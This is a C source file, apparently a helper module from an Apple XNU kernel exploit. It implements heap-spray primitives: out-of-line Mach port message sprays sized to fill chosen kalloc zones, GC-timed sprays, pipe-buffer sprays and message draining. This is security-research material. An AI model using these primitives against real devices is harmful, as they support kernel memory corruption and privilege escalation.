/*
 * kernel_alloc.c
 * Brandon Azad
 */
#include "kernel_alloc.h"

#include <assert.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>
#include <CoreFoundation/CoreFoundation.h>

#include "log.h"
#include "parameters.h"
#include "platform.h"

// Compute the minimum of 2 values.
#define min(a, b) ((a) < (b) ? (a) : (b))

size_t
message_size_for_kalloc_size(size_t kalloc_size) {
	if (kalloc_size <= kmsg_zone_size) {
		return 0;
	}
	// Thanks Ian!
	return ((3 * kalloc_size) / 4) - 0x74;
}

size_t
kalloc_size_for_message_size(size_t message_size) {
	if (message_size <= message_size_for_kmsg_zone) {
		return 0;
	}
	return message_size + ((message_size - 28) / 12) * 4 + 164;
}

size_t
ipc_kmsg_size_for_message_size(size_t message_size) {
	if (message_size <= message_size_for_kmsg_zone) {
		return kmsg_zone_size;
	}
	return kalloc_size_for_message_size(message_size);
}

// A message containing out-of-line ports.
struct ool_ports_msg {
	mach_msg_header_t               header;
	mach_msg_body_t                 body;
	mach_msg_ool_ports_descriptor_t ool_ports[0];
};

size_t
ool_ports_spray_port(mach_port_t holding_port,
		const mach_port_t *ool_ports, size_t port_count,
		mach_msg_type_name_t ool_disposition, size_t ool_count,
		size_t message_size, size_t message_count) {
	// Calculate the size of each component.
	struct ool_ports_msg *msg;
	// Sanity checks.
	assert(sizeof(*msg) + ool_count * sizeof(msg->ool_ports[0]) <= message_size);
	assert(port_count * ool_count <= max_ool_ports_per_message);
	assert(message_count <= MACH_PORT_QLIMIT_MAX);
	// Allocate a message containing the required number of OOL ports descriptors.
	msg = calloc(1, message_size);
	assert(msg != NULL);
	// Trace the kalloc allocations we're about to perform.
	DEBUG_TRACE(2, "%s: %zu * kalloc(%zu) + %zu * kalloc(%zu)", __func__,
			ool_count * message_count, port_count * sizeof(uint64_t),
			message_count, kalloc_size_for_message_size(message_size));
	// If the user didn't supply any ool_ports, create our own.
	mach_port_t *alloc_ports = NULL;
	if (ool_ports == NULL) {
		alloc_ports = calloc(port_count, sizeof(mach_port_t));
		assert(alloc_ports != NULL);
		ool_ports = alloc_ports;
	}
	// Populate the message. Each OOL ports descriptor will be a kalloc.
	msg->header.msgh_bits           = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_MAKE_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
	msg->header.msgh_remote_port    = holding_port;
	msg->header.msgh_size           = (mach_msg_size_t) message_size;
	msg->header.msgh_id             = 'ools';
	msg->body.msgh_descriptor_count = (mach_msg_size_t) ool_count;
	mach_msg_ool_ports_descriptor_t ool_descriptor = {};
	ool_descriptor.type             = MACH_MSG_OOL_PORTS_DESCRIPTOR;
	ool_descriptor.address          = (void *) ool_ports;
	ool_descriptor.count            = (mach_msg_size_t) port_count;
	ool_descriptor.deallocate       = FALSE;
	ool_descriptor.copy             = MACH_MSG_PHYSICAL_COPY;
	ool_descriptor.disposition      = ool_disposition;
	for (size_t i = 0; i < ool_count; i++) {
		msg->ool_ports[i] = ool_descriptor;
	}
	// Send the messages.
	size_t messages_sent = 0;
	for (; messages_sent < message_count; messages_sent++) {
		kern_return_t kr = mach_msg(
				&msg->header,
				MACH_SEND_MSG | MACH_MSG_OPTION_NONE,
				(mach_msg_size_t) message_size,
				0,
				MACH_PORT_NULL,
				MACH_MSG_TIMEOUT_NONE,
				MACH_PORT_NULL);
		if (kr != KERN_SUCCESS) {
			ERROR("%s returned %d: %s", "mach_msg", kr, mach_error_string(kr));
			break;
		}
	}
	// Clean up the allocated ports.
	if (alloc_ports != NULL) {
		free(alloc_ports);
	}
	// Return the number of messages we sent.
	return messages_sent;
}

/*
 * kalloc_spray_compute_message_shape
 *
 * Description:
 * 	Compute the shape of a message to maximally spray the specified kalloc zone. This spray is
 * 	good for consuming memory, not for overwriting memory with specific contents.
 */
static void
kalloc_spray_compute_message_shape(size_t kalloc_min, size_t kalloc_zone,
		size_t *message_size, size_t *ools_per_message, size_t *ports_per_ool) {
	assert(kmsg_zone_size < kalloc_min);
	assert(kalloc_min <= kalloc_zone);
	// We always want to maximize the number of OOL port kalloc allocations per message, so let
	// the message take up the a full zone element if needed.
	size_t max_message_size = message_size_for_kalloc_size(kalloc_zone);
	// Since we can send a maximum of max_ool_ports_per_message OOL ports in a single message,
	// we always want to send the minimum number of OOL ports in each descriptor (since adding
	// more ports in a descriptor only counts against the limit without increasing the number
	// of allocations). Thus, use the smallest number of ports that gets us at least
	// kalloc_min.
	size_t ports_per_ool_ = (kalloc_min + sizeof(uint64_t) - 1) / sizeof(uint64_t);
	// How many OOL ports descriptors can we send per message? As many as we'd like, as long
	// as:
	// 1. we have space for them in the message, and
	// 2. we don't blow through the max_ool_ports_per_message limit.
	size_t max_ools_by_message_size =
		(max_message_size - sizeof(mach_msg_base_t))
			/ sizeof(mach_msg_ool_ports_descriptor_t);
	size_t max_ools_by_port_limit = max_ool_ports_per_message / ports_per_ool_;
	size_t ools_per_message_ = min(max_ools_by_message_size, max_ools_by_port_limit);
	// Now that we know how many OOL ports descriptors we can send per message, let's calculate
	// the message size. If the message size is too small, we'll just round it up.
	size_t message_size_ = sizeof(mach_msg_base_t)
		+ ools_per_message_ * sizeof(mach_msg_ool_ports_descriptor_t);
	assert(kalloc_size_for_message_size(message_size_) <= kalloc_zone);
	if (kalloc_size_for_message_size(message_size_) < kalloc_min) {
		size_t kalloc_min_rounded = (kalloc_min + 15) & ~15;
		message_size_ = (message_size_for_kalloc_size(kalloc_min_rounded) + 3) & ~3;
	}
	assert(kalloc_min <= kalloc_size_for_message_size(message_size_));
	assert(kalloc_size_for_message_size(message_size_) <= kalloc_zone);
	// Return the values.
	*message_size     = message_size_;
	*ools_per_message = ools_per_message_;
	*ports_per_ool    = ports_per_ool_;
}

size_t
kalloc_spray_port(mach_port_t holding_port, size_t min_kalloc_size, size_t kalloc_zone,
		size_t kalloc_count) {
	// First compute the message shape for spraying the specified zone.
	size_t message_size, ools_per_message, ports_per_ool;
	kalloc_spray_compute_message_shape(min_kalloc_size, kalloc_zone,
			&message_size, &ools_per_message, &ports_per_ool);
	assert(min_kalloc_size <= kalloc_size_for_message_size(message_size));
	assert(kalloc_size_for_message_size(message_size) <= kalloc_zone);
	assert(min_kalloc_size <= ports_per_ool * sizeof(uint64_t));
	assert(ports_per_ool * sizeof(uint64_t) <= kalloc_zone);
	assert(sizeof(mach_msg_base_t) + ools_per_message * sizeof(mach_msg_ool_ports_descriptor_t) <= message_size);
	// How many allocations does each message we send give us? Well, there's 1 allocation for
	// the message and 1 allocation for each OOL ports descriptor.
	size_t kallocs_per_message = 1 + ools_per_message;
	// How many full/partial messages will we need to spray kalloc_count allocations? If the
	// number of full messages is greater than the queue limit, truncate to that many messages.
	size_t full_message_count = kalloc_count / kallocs_per_message;
	size_t partial_message_kalloc_count = kalloc_count % kallocs_per_message;
	if (full_message_count >= MACH_PORT_QLIMIT_MAX) {
		full_message_count = MACH_PORT_QLIMIT_MAX;
		partial_message_kalloc_count = 0;
	}
	// Alright, so now we have all the parameters we need. Spray all the full messages to the
	// port.
	DEBUG_TRACE(2, "%s: %zu full messages, %zu descriptors per message, "
			"%zu ports per descriptor, %zu kallocs (%zu bytes) per message",
			__func__, full_message_count, ools_per_message, ports_per_ool,
			kallocs_per_message, kallocs_per_message * kalloc_zone);
	size_t full_messages_sent = ool_ports_spray_port(
			holding_port,
			NULL,
			ports_per_ool,
			MACH_MSG_TYPE_MAKE_SEND,
			ools_per_message,
			message_size,
			full_message_count);
	size_t full_messages_kallocs = full_messages_sent * kallocs_per_message;
	// If we sent all the full messages (indicating no errors were encountered) and we also
	// want to send a partial message, send that.
	size_t partial_message_kallocs = 0;
	if (full_messages_sent == full_message_count && partial_message_kalloc_count > 0) {
		size_t partial_message_ools = partial_message_kalloc_count - 1;
		size_t partial_messages_sent = ool_ports_spray_port(
				holding_port,
				NULL,
				ports_per_ool,
				MACH_MSG_TYPE_MAKE_SEND,
				partial_message_ools,
				message_size,
				1);
		partial_message_kallocs = partial_messages_sent * partial_message_kalloc_count;
	}
	// Finally, return the total number of kallocs stashed in our port.
	assert(full_messages_kallocs + partial_message_kallocs <= kalloc_count);
	return full_messages_kallocs + partial_message_kallocs;
}

size_t
kalloc_spray_size(mach_port_t *holding_ports, size_t *port_count,
		size_t min_kalloc_size, size_t kalloc_zone, size_t spray_size) {
	size_t kallocs_needed = (spray_size + kalloc_zone - 1) / kalloc_zone;
	size_t count = *port_count;
	// Spray to each of the ports in turn.
	size_t kallocs_left = kallocs_needed;
	size_t ports_used = 0;
	for (; ports_used < count && kallocs_left > 0; ports_used++) {
		size_t kallocs_done = kalloc_spray_port(holding_ports[ports_used],
				min_kalloc_size, kalloc_zone, kallocs_left);
		assert(kallocs_done <= kallocs_left);
		kallocs_left -= kallocs_done;
	}
	// Compute how many kallocs were actually performed.
	size_t kallocs_done = kallocs_needed - kallocs_left;
	if (kallocs_left > 0) {
		WARNING("failed to spray %zu * kalloc(%zu)", kallocs_left, kalloc_zone);
	}
	// Return the number of ports actually used and the number of bytes actually sprayed.
	*port_count = ports_used;
	return kallocs_done * kalloc_zone;
}

mach_port_t *
create_ports(size_t count) {
	mach_port_t *ports = calloc(count, sizeof(*ports));
	assert(ports != NULL);
	mach_port_options_t options = {};
	for (size_t i = 0; i < count; i++) {
		kern_return_t kr = mach_port_construct(mach_task_self(), &options, 0, &ports[i]);
		assert(kr == KERN_SUCCESS);
	}
	return ports;
}

void
destroy_ports(mach_port_t *ports, size_t count) {
	for (size_t i = 0; i < count; i++) {
		mach_port_t port = ports[i];
		if (MACH_PORT_VALID(port)) {
			kern_return_t kr = mach_port_destroy(mach_task_self(), port);
			if (kr != KERN_SUCCESS) {
				ERROR("%s returned %d: %s", "mach_port_destroy",
						kr, mach_error_string(kr));
			}
		}
		ports[i] = MACH_PORT_DEAD;
	}
}

void
deallocate_ports(mach_port_t *ports, size_t count) {
	for (size_t i = 0; i < count; i++) {
		mach_port_t port = ports[i];
		if (MACH_PORT_VALID(port)) {
			kern_return_t kr = mach_port_deallocate(mach_task_self(), port);
			if (kr != KERN_SUCCESS) {
				ERROR("%s returned %d: %s", "mach_port_deallocate",
						kr, mach_error_string(kr));
			}
		}
		ports[i] = MACH_PORT_DEAD;
	}
}

void
port_increase_queue_limit(mach_port_t port) {
	mach_port_limits_t limits = { .mpl_qlimit = MACH_PORT_QLIMIT_MAX };
	kern_return_t kr = mach_port_set_attributes(
			mach_task_self(),
			port,
			MACH_PORT_LIMITS_INFO,
			(mach_port_info_t) &limits,
			MACH_PORT_LIMITS_INFO_COUNT);
	assert(kr == KERN_SUCCESS);
}

void
port_insert_send_right(mach_port_t port) {
	kern_return_t kr = mach_port_insert_right(mach_task_self(), port, port,
			MACH_MSG_TYPE_MAKE_SEND);
	assert(kr == KERN_SUCCESS);
}

/*
 * ool_ports_spray_size_with_gc_compute_parameters
 *
 * Description:
 * 	Compute the spray parameters for ool_ports_spray_size_with_gc().
 */
static void
ool_ports_spray_size_with_gc_compute_parameters(
		size_t ports_per_ool, size_t message_size, size_t spray_size,
		size_t *ool_size, size_t *ools_per_message, size_t *ools_needed) {
	// Each message will contain no more than gc_step bytes of OOL ports.
	const size_t max_ool_memory_per_message = gc_step;
	// How many OOL ports descriptors can we send per message? As many as we'd like, as long
	// as:
	// 1. we aren't sending more than gc_step bytes of OOL ports in a message,
	// 2. we have space for them in the message, and
	// 3. we don't blow through the max_ool_ports_per_message limit.
	size_t ool_size_ = ports_per_ool * sizeof(uint64_t);
	size_t max_ools_by_memory = max_ool_memory_per_message / ool_size_;
	size_t max_ools_by_message_size =
		(message_size - sizeof(mach_msg_base_t))
			/ sizeof(mach_msg_ool_ports_descriptor_t);
	size_t max_ools_by_port_limit = max_ool_ports_per_message / ports_per_ool;
	size_t ools_per_message_ = min(max_ools_by_memory,
			min(max_ools_by_message_size, max_ools_by_port_limit));
	// How many OOL port descriptors will we need to spray? Enough to fill all the requested
	// memory.
	size_t ools_needed_ = (spray_size + ool_size_ - 1) / ool_size_;
	// Return the parameters.
	*ool_size         = ool_size_;
	*ools_per_message = ools_per_message_;
	*ools_needed      = ools_needed_;
}

size_t
ool_ports_spray_size_with_gc(mach_port_t *holding_ports, size_t *holding_port_count,
		size_t message_size, const mach_port_t *ool_ports, size_t ool_port_count,
		mach_msg_type_name_t ool_disposition, size_t spray_size) {
	// Compute the parameters for the spray.
	size_t ool_size, ools_per_message, ools_needed;
	ool_ports_spray_size_with_gc_compute_parameters(ool_port_count, message_size, spray_size,
			&ool_size, &ools_per_message, &ools_needed);
	// Spray to each of the ports in turn until we've created the requisite number of OOL ports
	// allocations.
	ssize_t ools_left = ools_needed;
	size_t sprayed = 0;
	size_t next_gc_step = 0;
	size_t port_count = *holding_port_count;
	size_t ports_used = 0;
	for (; ports_used < port_count && ools_left > 0; ports_used++) {
		// Spray this port one message at a time until we've maxed out its queue.
		size_t messages_sent = 0;
		for (; messages_sent < (kCFCoreFoundationVersionNumber >= 1535.12 ? MACH_PORT_QLIMIT_MAX : MACH_PORT_QLIMIT_DEFAULT) && ools_left > 0; messages_sent++) {
			// If we've crossed the GC sleep boundary, sleep for a bit and schedule the
			// next one.
			if (sprayed >= next_gc_step) {
				next_gc_step += gc_step;
				pthread_yield_np();
				usleep(10000);
				fprintf(stderr, ".");
			}
			// Send a message.
			size_t sent = ool_ports_spray_port(
					holding_ports[ports_used],
					ool_ports,
					ool_port_count,
					ool_disposition,
					ools_per_message,
					message_size,
					1);
			// If we couldn't send a message to this port, stop trying to send more
			// messages and move on to the next port.
			if (sent != 1) {
				assert(sent == 0);
				break;
			}
			// We sent a full message worth of OOL port descriptors.
			sprayed += ools_per_message * ool_size;
			ools_left -= ools_per_message;
		}
	}
	fprintf(stderr, "\n");
	// Return the number of ports actually used and the number of bytes actually sprayed.
	*holding_port_count = ports_used;
	return sprayed;
}

void
port_drain_messages(mach_port_t port, void (^message_handler)(mach_msg_header_t *)) {
	kern_return_t kr;
	mach_msg_option_t options = MACH_RCV_MSG | MACH_RCV_LARGE | MACH_RCV_TIMEOUT
		| MACH_RCV_TRAILER_TYPE(MACH_MSG_TRAILER_FORMAT_0)
		| MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_NULL);
	// Allocate an initial message buffer.
	mach_msg_size_t msg_size = 0x4000;
	mach_msg_base_t *msg = malloc(msg_size);
	assert(msg != NULL);
	// Loop through all the messages queued on the port.
	for (;;) {
		// Try to receive the message. If the buffer isn't big enough, reallocate
		// and try again. This should only happen twice.
		for (size_t try = 0;; try++) {
			assert(try < 2);
			// Receive the message.
			kr = mach_msg(
					&msg->header,
					options,
					0,
					msg_size,
					port,
					0,
					MACH_PORT_NULL);
			if (kr != MACH_RCV_LARGE) {
				break;
			}
			// The buffer was too small, increase it.
			msg_size = msg->header.msgh_size + REQUESTED_TRAILER_SIZE(options);
			free(msg);
			msg = malloc(msg_size);
			assert(msg != NULL);
		}
		// If we got an error, stop processing messages on this port. If the error is a
		// timeout, that means that we've exhausted the queue, so don't print an error
		// message.
		if (kr != KERN_SUCCESS) {
			if (kr != MACH_RCV_TIMED_OUT) {
				ERROR("%s returned %d: %s", "mach_msg", kr, mach_error_string(kr));
			}
			break;
		}
		// Pass the message to the message handler.
		message_handler(&msg->header);
	}
	// Clean up resources.
	free(msg);
}

void
port_discard_messages(mach_port_t port) {
	port_drain_messages(port, ^(mach_msg_header_t *header) {
		mach_msg_destroy(header);
	});
}

void
ool_ports_spray_receive(mach_port_t *holding_ports, size_t holding_port_count,
		void (^ool_ports_handler)(mach_port_t *, size_t)) {
	// Loop through all the ports.
	for (size_t port_index = 0; port_index < holding_port_count; port_index++) {
		// Handle each message on the port.
		port_drain_messages(holding_ports[port_index], ^(mach_msg_header_t *msg0) {
			struct ool_ports_msg *msg = (struct ool_ports_msg *)msg0;
			// We've successfully received a message. Make sure it's the type we
			// expect.
			if (msg->header.msgh_id != 'ools') {
				WARNING("received unexpected message id 0x%x",
						msg->header.msgh_id);
				goto done;
			}
			if (!MACH_MSGH_BITS_IS_COMPLEX(msg->header.msgh_bits)) {
				WARNING("skipping non-complex message");
				goto done;
			}
			// Go through the descriptors one at a time passing them to the handler
			// block.
			mach_msg_descriptor_t *d = (mach_msg_descriptor_t *)&msg->ool_ports[0];
			for (size_t i = 0; i < msg->body.msgh_descriptor_count; i++) {
				void *next;
				switch (d->type.type) {
					case MACH_MSG_OOL_PORTS_DESCRIPTOR:
						next = &d->ool_ports + 1;
						mach_port_t *ports = (mach_port_t *)
							d->ool_ports.address;
						size_t count = d->ool_ports.count;
						ool_ports_handler(ports, count);
						break;
					default:
						WARNING("unexpected descriptor type %u",
								d->type.type);
						goto done;
				}
				d = (mach_msg_descriptor_t *)next;
			}
done:
			// Discard the message.
			mach_msg_destroy(&msg->header);
		});
	}
}

void
increase_file_limit() {
	struct rlimit rl = {};
	int error = getrlimit(RLIMIT_NOFILE, &rl);
	assert(error == 0);
	rl.rlim_cur = 10240;
	rl.rlim_max = rl.rlim_cur;
	error = setrlimit(RLIMIT_NOFILE, &rl);
	if (error != 0) {
		ERROR("could not increase file limit");
	}
	error = getrlimit(RLIMIT_NOFILE, &rl);
	assert(error == 0);
	if (rl.rlim_cur != 10240) {
		ERROR("file limit is %llu", rl.rlim_cur);
	}
}

void
pipe_close(int pipefds[2]) {
	close(pipefds[0]);
	close(pipefds[1]);
}

/*
 * set_nonblock
 *
 * Description:
 * 	Set the O_NONBLOCK flag on the specified file descriptor.
 */
static void
set_nonblock(int fd) {
	int flags = fcntl(fd, F_GETFL);
	flags |= O_NONBLOCK;
	fcntl(fd, F_SETFL, flags);
}

int *
create_pipes(size_t *pipe_count) {
	// Allocate our initial array.
	size_t capacity = *pipe_count;
	int *pipefds = calloc(2 * capacity, sizeof(int));
	assert(pipefds != NULL);
	// Create as many pipes as we can.
	size_t count = 0;
	for (; count < capacity; count++) {
		// First create our pipe fds.
		int fds[2] = { -1, -1 };
		int error = pipe(fds);
		// Unfortunately pipe() seems to return success with invalid fds once we've
		// exhausted the file limit. Check for this.
		if (error != 0 || fds[0] < 0 || fds[1] < 0) {
			pipe_close(fds);
			break;
		}
		// Mark the write-end as nonblocking.
		set_nonblock(fds[1]);
		// Store the fds.
		pipefds[2 * count + 0] = fds[0];
		pipefds[2 * count + 1] = fds[1];
	}
	// Truncate the array to the smaller size.
	int *new_pipefds = realloc(pipefds, 2 * count * sizeof(int));
	assert(new_pipefds != NULL);
	// Return the count and the array.
	*pipe_count = count;
	return new_pipefds;
}

void
close_pipes(int *pipefds, size_t pipe_count) {
	for (size_t i = 0; i < pipe_count; i++) {
		pipe_close(pipefds + 2 * i);
	}
}

size_t
pipe_spray(const int *pipefds, size_t pipe_count,
		void *pipe_buffer, size_t pipe_buffer_size,
		void (^update)(uint32_t pipe_index, void *data, size_t size)) {
	assert(pipe_count <= 0xffffff);
	assert(pipe_buffer_size > 512);
	size_t write_size = pipe_buffer_size - 1;
	size_t pipes_filled = 0;
	for (size_t i = 0; i < pipe_count; i++) {
		// Update the buffer.
		if (update != NULL) {
			update((uint32_t)i, pipe_buffer, pipe_buffer_size);
		}
		// Fill the write-end of the pipe with the buffer. Leave off the last byte.
		int wfd = pipefds[2 * i + 1];
		ssize_t written = write(wfd, pipe_buffer, write_size);
		if (written != write_size) {
			// This is most likely because we've run out of pipe buffer memory. None of
			// the subsequent writes will work either.
			break;
		}
		pipes_filled++;
	}
	return pipes_filled;
}